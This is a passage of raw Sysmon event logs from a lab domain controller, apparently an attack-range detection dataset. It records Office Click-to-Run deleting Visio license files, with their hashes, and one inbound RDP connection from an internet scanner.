Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioStd2019R_Grace-ppd.xrm-msMD5=D4DE84F542CBC6AF435F79E778802E56,SHA256=3A05D99CAA6621FD650E3231849CA15F3012A606D688BFC69A8AEDA3028967D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProXC2RVL_MAKC2R-ul-phn.xrm-msMD5=F503DD663CDAB7E0BCF680E150F0677E,SHA256=EEAEDFC80E5DCC0B614149BA3A1E16C1442C3E815E136B60CC566C5D6486BD15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProXC2RVL_MAKC2R-ul-oob.xrm-msMD5=56CBB523AE31FCF6C4FA19C38E2EE389,SHA256=7A2FB27DA5B912C849BD721C8D2D222FBA03393397986D6FA6FDE89147D2341B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProXC2RVL_MAKC2R-ppd.xrm-msMD5=36E8A19A490A1674C1DC3CC4931A85F5,SHA256=98E9784DD5C7A4B8EE51C44F3D6D23C1C47F721BC18621BEFE1829FD89F27A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProXC2RVL_MAKC2R-pl.xrm-msMD5=45E2F06088A008293211D2FB73884FE1,SHA256=B65DD50891FA150693E81E7F61DF1B0747343B6877199712BF396738BA871630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ul.xrm-msMD5=D84A82DF7C6C35AF8175C9B2C623638F,SHA256=FB799E8C5A2BECD03F1D73AFFA4BCF4F80AE64EAFE8FAD4D76FEEF12F296E8E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ul-oob.xrm-msMD5=B21FB6013D0994FFE700364A553254AB,SHA256=8A9E002CA1A946C1E90BE746A770E814B7C4D3AFF8D59576415A8AA7D967ED65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProXC2RVL_KMS_ClientC2R-ppd.xrm-msMD5=300A4A07E3C33EFB6A2A5B24C70CF41A,SHA256=7B3800A51DEBAD9EC5AD2038A6416B63B31A38009248EDF18904C4B69A097DB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProVL_MAK-ul-phn.xrm-msMD5=B71C57A397D5FB0CCA5705FDC539C6AD,SHA256=C92AB9B8FC9467C37E5ECB823F769597C5005993AC642AECE2A84E4DD31B27B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-msMD5=56FA5266B392EF32690419CDE6537300,SHA256=73A5B1F82D2B04ED40157A53770FDA46DEA23C7DD209096B49D9A9E43F8D9C1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProVL_MAK-ppd.xrm-msMD5=F1ADAE6BAABFB67EADF41DD51705C3A7,SHA256=D9A008063D8590C1D6D7C54EF0DF2EA1AEC0147877364D5BA92653DB6774EAF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProVL_MAK-pl.xrm-msMD5=E84876B7D0ABC7324972F9538B90BFAA,SHA256=1E18428BC5FAD7A816930FFAEE9818D37E8E1F2975DD24BE85A18D961126E1FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProVL_KMS_Client-ul.xrm-msMD5=0C0F801EE9F9592051756C8FD0E22510,SHA256=E504FFF8FDC733E3D9C29A2E1539EE24ADA10C7D418D52024913485BFC2CA78E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProVL_KMS_Client-ul-oob.xrm-msMD5=A6D8643B6E98A28A1B4681B41C9D5C5A,SHA256=3294EB01A732F5B8413EA718990CC7C50754D4DF195D9BD51D173F6B03E635E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProVL_KMS_Client-ppd.xrm-msMD5=C8CF0FA08B104BE7240E6F416EC3848A,SHA256=025876EF7E0D648FA1C7CC7E768B105A396B34E49E35F09295545D1385D7BC1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Trial-ul-oob.xrm-msMD5=C25141BB24ED9923B549409960D06F1C,SHA256=BECD22B056FD56E45D67821BC1608C4C6C3F79E65222610B2C5F1F99ECE8B813,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Trial-ppd.xrm-msMD5=27BB5C68DAB38EAA90D22B463BA9F0BA,SHA256=1A6103D2ECC7B6497C1E933EB2D02880AE19FDC8B767CDAD88DB0B7F8D79C77F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Trial-pl.xrm-msMD5=71204F8DA28701F4E4E40EC61C30B90B,SHA256=7FF791C8B992EC85EAD10598B8B57AB5262C1F6E46444256CCB7A05BECA7295C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail2-ul-phn.xrm-msMD5=CE32A37872DABBC21C3D3280DC8ECD0E,SHA256=546F404054F8D32EEAC1FAB295551FD43F83B727A10CFA144770086EA03F2E13,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000067985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.190{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60767-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000067984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail2-ul-oob.xrm-msMD5=E94D67B36864990A7FD44D68BCB6DB35,SHA256=3A6C5D9C23B95C92023151BA6AA7CFE2383D2B4A421149E70A3CD9FBFE261181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail2-ppd.xrm-msMD5=41FA998DE39615889F190DC499DB9B71,SHA256=356F16F2AD07F6C22B1FA405CB38F396DCF4AF2565BC596B41C82907D6BF0728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail2-pl.xrm-msMD5=8B507DFD673009E67558DAF38A564571,SHA256=9E0AF4DF2449F6BAAC8B42550E2760F9AD5315FD58CB4DA3C97A1C1EE2A99AD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail-ul-phn.xrm-msMD5=FC3003DE9300930D2EB66B413DC4E5B4,SHA256=D6E8D528B767904FBF682E6621E68AEBB9A854F1785A3FE3A93697CEAF105DE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail-ul-oob.xrm-msMD5=C02BA07E56E4B6C58079DFBB6E70D79F,SHA256=CA63C36AE69AA62F247BE8BA83E6CC66CCD2BCF946A30B6D907C9CB219C4A9D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail-ppd.xrm-msMD5=6571EE7A187E03D64D69318ACF1A97D9,SHA256=E379C6373B117FCACBF50F9AF7FA30791D7F353EDEAFD4EC2EADB187AF1CA1BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Retail-pl.xrm-msMD5=E0D61C66289DA254EA8B2C1092D50AEF,SHA256=AF367F77A680AEC7FE756841D06D7AFCF6CD742E6EF2735B6A8673E5B0AAE4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_OEM_Perp-ul-phn.xrm-msMD5=DE203AA2B23700706331D4B2E36B3602,SHA256=D67D482251247A37CDC9F02AC3E872BD0B252E32E64E00AA306FF1152F6575FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_OEM_Perp-ul-oob.xrm-msMD5=584699CA1EE5B7ABD0A6A6AA962708BE,SHA256=420C92386A4EA9B3B928E6D965F532852448C2301587AAD8BC558755AADE4536,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_OEM_Perp-ppd.xrm-msMD5=38149B28DFF22DC313CF1A89E1D913BD,SHA256=F7DB4967E7FEE8432C781262C8223BA7271386F33631246BF7AB091169A9FFFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_OEM_Perp-pl.xrm-msMD5=C79F53636E34C53CF171002536BF7B03,SHA256=4385D6EA91056733422B24F60E51CCDE0513562C6C415DE9ED00EE2136CE0053,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Grace-ul-oob.xrm-msMD5=FC3F849E54BACDA35E8ADD9536701D0A,SHA256=3AE69F66F621ACA3ECC58260198FA6C5E6DF5BDBDEF13A5683AA7E49AE4E70DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProR_Grace-ppd.xrm-msMD5=B19D3069630FA105B541804D54E980BC,SHA256=5D375D3747297108E5AB199A68BF36CBF0F782CDCC425E2A4F618EE4B4A80DDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_SubTrial-ul-oob.xrm-msMD5=0FA11BAB510010BA7C63BF23895AAC08,SHA256=392DED0B9388BFB553B87C1ED092264FD1AB27D44E3B3B1AE906AD7E50CA7610,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_SubTrial-ppd.xrm-msMD5=068CB06DC63F6AE36B5AC8AF6209C9D3,SHA256=36EDA8F6BB009963285D8A7D8656A79F9A5A34B305FB3EE5F5E92587664AD072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_SubTrial-pl.xrm-msMD5=23FEA470288AA2891B896FE6A5D6C024,SHA256=ACC1914C39F73AD4CCA0FB0EE2045CF497D0D2C29465ECEFC6368A1F37A24478,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_SubTest-ul-oob.xrm-msMD5=6059F92A9D8FD5702A764FFABA2E3B7F,SHA256=05CF5EFE4491F59C50123482F2A703705F0AE905C9C4E9F54288BD30EB364E66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_SubTest-ppd.xrm-msMD5=027F9F8DB96E7754E85C469F70D11A25,SHA256=66018F2F0A31EE345B838D589DD1AAC10E6D6C242DCE9D9CF7677A5236645CCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_SubTest-pl.xrm-msMD5=9CE0A4DF6D10531B05488B17258281D3,SHA256=072B1C31916BEB86DB2680699B0BE7B663CA597DD9C6D6CB87929541BC7D5DF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_Subscription-ul-oob.xrm-msMD5=12E92CB438665D8C7C6008BC100293D0,SHA256=44895B5DF7E95C3364E699E0FF3069D29A41E2060264249723E5A5968F7C6491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_Subscription-ppd.xrm-msMD5=A3154D87890F46FF0857FC5D43D61D54,SHA256=E790D92022B5862634E63FE9117644E0437ABC59300F34872B9016D794AB79D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProO365R_Subscription-pl.xrm-msMD5=E4439E8CC9A100D8515C607EFE4BADAC,SHA256=D6D18FEA7273CA508A1F38CE0D9DE4C1890CCD39C11797F1C42F5E4F0053403C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProMSDNR_Retail-ul-phn.xrm-msMD5=495B456D88D2656736F69D677AD7487C,SHA256=0B9D7E9D38C353E36FA4D5536E2298A01BFEEE5168BABCE3CC8CA4AB8BE6CA37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\VisioProMSDNR_Retail-ul-oob.xrm-msMD5=D57B428C7ABDC1DCE5C14720BFC2927D,SHA256=99F232D5AF7334DDC313B307E9CA52341E9E27960FB0E1B28A65FB669D5BC287,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 